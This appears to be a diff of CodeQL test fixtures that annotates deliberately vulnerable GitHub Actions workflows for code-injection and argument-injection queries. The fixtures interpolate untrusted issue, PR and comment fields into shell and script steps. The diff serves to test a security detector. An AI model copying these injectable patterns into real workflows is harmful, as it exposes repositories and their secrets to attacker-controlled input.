.github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref index a2f6e1c12b9c..3475e69cd3ad 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-088/ArgumentInjectionCritical.ql +query: experimental/Security/CWE-088/ArgumentInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 12171d8c7f27..981e5b865494 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | @@ -20,4 +21,3 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref index b96467552c5b..3aa94b52965a 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-088/ArgumentInjectionMedium.ql +query: experimental/Security/CWE-088/ArgumentInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml index ba7d3eec1af7..bed01ffea540 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml @@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml index 510ad86cbfa9..f4a9d4574528 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml @@ -6,4 +6,4 @@ runs: - shell: bash env: FOO: ${{ secrets.FOO}} - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml index ba7d3eec1af7..6c63aa58afa5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml @@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 53a2e0c87e27..75a02958a998 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.issue.body }}' + run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] - name: Step id: step env: @@ -25,10 +25,10 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.issue.body }} + FOO2: ${{ github.event.issue.body }} # $ Source[actions/code-injection/critical] shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash - run: echo "${{ inputs.taint }}" + run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml index 0048a4ca31e1..25b58d07466c 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml @@ -213,7 +213,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml index 8bffcdc4020e..0a37ade5da63 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml @@ -74,7 +74,7 @@ runs: # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli run: | packages="ultralytics-actions" - if [ "${{ inputs.spelling }}" = "true" ]; then + if [ "${{ inputs.spelling }}" = "true" ]; then # $ Alert[actions/code-injection/medium] packages="$packages codespell tomli" fi @@ -211,10 +211,10 @@ runs: - name: Commit and Push Changes if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' run: | - git config --global user.name "${{ inputs.github_username }}" - git config --global user.email "${{ inputs.github_email }}" + git config --global user.name "${{ inputs.github_username }}" # $ Alert[actions/code-injection/medium] + git config --global user.email "${{ inputs.github_email }}" # $ Alert[actions/code-injection/medium] # this action is not called in the test - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/medium] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml index 398c0ee6a6e1..cd9dcaf1a0b0 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -19,7 +19,7 @@ runs: using: composite steps: - shell: bash - run: echo "${{ inputs.title }}" + run: echo "${{ inputs.title }}" # $ Alert[actions/code-injection/critical] - uses: frabert/replace-string-action@v2.5 id: out with: diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml index a8019fbbf145..85decb599321 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml @@ -93,7 +93,7 @@ runs: shell: bash - shell: bash run: | - echo "${{ inputs.body }}" + echo "${{ inputs.body }}" # $ Alert[actions/code-injection/critical] # Checkout Repository ---------------------------------------------------------------------------------------------- - name: Checkout Repository @@ -220,7 +220,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml index 7b9c57354882..301be58e2e80 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml @@ -14,7 +14,7 @@ jobs: - uses: actions/checkout@v2 - name: Remove conflicting chars env: - ISSUE_TITLE: ${{github.event.issue.title}} + ISSUE_TITLE: ${{github.event.issue.title}} # $ Source[actions/code-injection/critical] uses: frabert/replace-string-action@1.2 id: remove_quotations with: @@ -24,6 +24,6 @@ jobs: - name: Check info id: check-info run: | - echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index 5cf7bbd4e6bd..c4add3b215ec 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -17,12 +17,12 @@ jobs: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr - - name: save PR id + - name: save PR id # $ Source[actions/code-injection/critical] id: pr run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - - run: echo ${{ steps.prepare.outputs.pr }} + - run: echo ${{ steps.prepare.outputs.pr }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml index 63acdc612b0e..2d1acd97b2dc 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml @@ -14,9 +14,9 @@ jobs: name: artifact # Save PR id to output - - name: Save artifact data + - name: Save artifact data # $ Source[actions/code-injection/critical] id: artifact run: echo "::set-output name=id::$(> $GITHUB_ENV + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV # $ Alert[actions/code-injection/medium] #If a target branch was found will run the action - if: env.destination_branch != 'invalid' @@ -50,7 +50,7 @@ jobs: git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} git cherry-pick -x ${{github.event.after}} --strategy-option theirs git push -u origin ${{env.auto_branch}} - hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" + hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" # $ Alert[actions/code-injection/medium] env: #Token used for the pull request. Corresponds to the DynamoBot account GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml index fdb140ec3802..d07398ebca72 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -4,5 +4,5 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' - - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml index 649d3a6e1319..5cdf5c0bf62d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml @@ -4,6 +4,6 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' - - run: echo '${{ github.event.discussion.body }}' - - run: echo '${{ github.event.comment.body }}' \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml index b4c2ecaec700..0da70f8e2d4a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -81,7 +81,7 @@ jobs: git push \ "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \ - 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' + 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] env: BOT_PA_TOKEN: ${{ secrets.githubBotPAT }} @@ -91,4 +91,4 @@ jobs: with: github-token: ${{ secrets.githubBotPAT }} script: | - const fileList = `${{ steps.git-commit.outputs.file-list }}` + const fileList = `${{ steps.git-commit.outputs.file-list }}` # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml index 0c4aa93c7a58..333af0376ca0 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" + - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; + const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; + const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml index a952c8c1ab85..38a6bcbd6af5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pages[1].title }}' - - run: echo '${{ github.event.pages[11].title }}' - - run: echo '${{ github.event.pages[0].page_name }}' - - run: echo '${{ github.event.pages[2222].page_name }}' + - run: echo '${{ github.event.pages[1].title }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[11].title }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[0].page_name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[2222].page_name }}' # $ Alert[actions/code-injection/medium] - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml index c8a30dad2944..4180c7d6769b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml @@ -15,7 +15,7 @@ jobs: - name: Extract and Clean Initial URL id: extract-url env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source[actions/code-injection/critical] run: | echo "::set-output name=initial_url::$BODY" @@ -34,4 +34,4 @@ jobs: - name: Update Comment with New URL run: | - NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 1ad46b0f6eb1..57df1a28983f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml index 4f149a920419..d32f1f2c1a87 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml index 21fa789d9e7d..4d838b0d465a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -42,4 +42,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml index b964bb78dac3..fc56cbc51211 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -41,4 +41,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml index d6b7b2b1b0c5..d075aecd67e7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -42,4 +42,4 @@ jobs: steps: - id: sink # Should not be reported since job1 is not needed - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml index 5e767ce0239f..348fe03ec72a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml @@ -1,20 +1,20 @@ on: issues env: - global_env: ${{ github.event.issue.title }} + global_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] test: test jobs: echo-chamber: env: - job_env: ${{ github.event.issue.title }} + job_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' - - run: echo '${{ github.event.issue.body }}' - - run: echo '${{ env.global_env }}' + - run: echo '${{ github.event.issue.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ env.global_env }}' # $ Alert[actions/code-injection/critical] - run: echo '${{ env.test }}' - - run: echo '${{ env.job_env }}' - - run: echo '${{ env.step_env }}' + - run: echo '${{ env.job_env }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ env.step_env }}' # $ Alert[actions/code-injection/critical] env: - step_env: ${{ github.event.issue.title }} + step_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml index b17a1fecbeb4..bfb4c4888624 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest if: ${{ github.event.comment.body == '/jira ticket' }} steps: - - run: echo ${{ github.event.comment.body }} + - run: echo ${{ github.event.comment.body }} # $ Alert[actions/code-injection/critical] - name: Login uses: atlassian/gajira-login@v3 @@ -20,7 +20,7 @@ jobs: JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} - name: SearchParam - run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' # $ Alert[actions/code-injection/critical] - name: Search id: search diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml index ad9187a3d6bf..ad5d52fcb6bc 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml @@ -41,7 +41,7 @@ jobs: run: | echo "Checking issue body for profanities..." PROFANITIES_LIST="bad|disguting|horrible" - if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then # $ Alert[actions/code-injection/critical] echo "Profanity detected in issue body. Please clean up the language." exit 1 else @@ -66,7 +66,7 @@ jobs: uses: actions/github-script@v5 with: script: | - const commentBody = "${{ github.event.comment.body }}"; + const commentBody = "${{ github.event.comment.body }}"; # $ 